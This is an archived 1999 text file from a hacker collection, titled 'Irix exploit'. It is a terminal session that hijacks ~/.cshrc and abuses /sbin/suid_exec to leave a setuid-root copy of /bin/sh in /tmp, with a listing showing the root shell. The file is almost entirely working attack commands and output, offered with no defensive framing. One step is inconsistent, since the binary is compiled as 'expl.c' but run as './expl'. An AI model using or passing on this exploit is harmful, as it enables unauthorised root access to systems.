home *** CD-ROM | disk | FTP | other *** search
/ Freaks Macintosh Archive / Freaks Macintosh Archive.bin / Freaks Macintosh Archives / •New Files / Happle#10 / Files / hack_part2.sit / hack_part2 / irix.suid_shell < prev    next >
Encoding:
Text File  |  1999-05-16  |  341 b   |  23 lines  |  [TEXT/ttxt]

  1. Irix exploit
  2.  
  3.  
  4. % setenv | grep SHELL
  5. SHELL=/bin/tcsh
  6. % mv ~/.cshrc ~/.cshrc.old
  7. % cat > ~/.cshrc
  8. cp /bin/sh /tmp
  9. chmod a+rsx /tmp/sh
  10. ^D
  11. % cat > expl.c
  12. main()
  13. {
  14.   execl("/sbin/suid_exec","/bin/su","/bin/su",0);
  15. }
  16. ^D
  17. % cc expl.c -o expl.c
  18. % ./expl
  19. Too many ('s.
  20. % ls -l /tmp/sh
  21. -r-sr-sr-x    1 root     sys       140784 Dec  2 19:21 /tmp/sh*
  22.  
  23.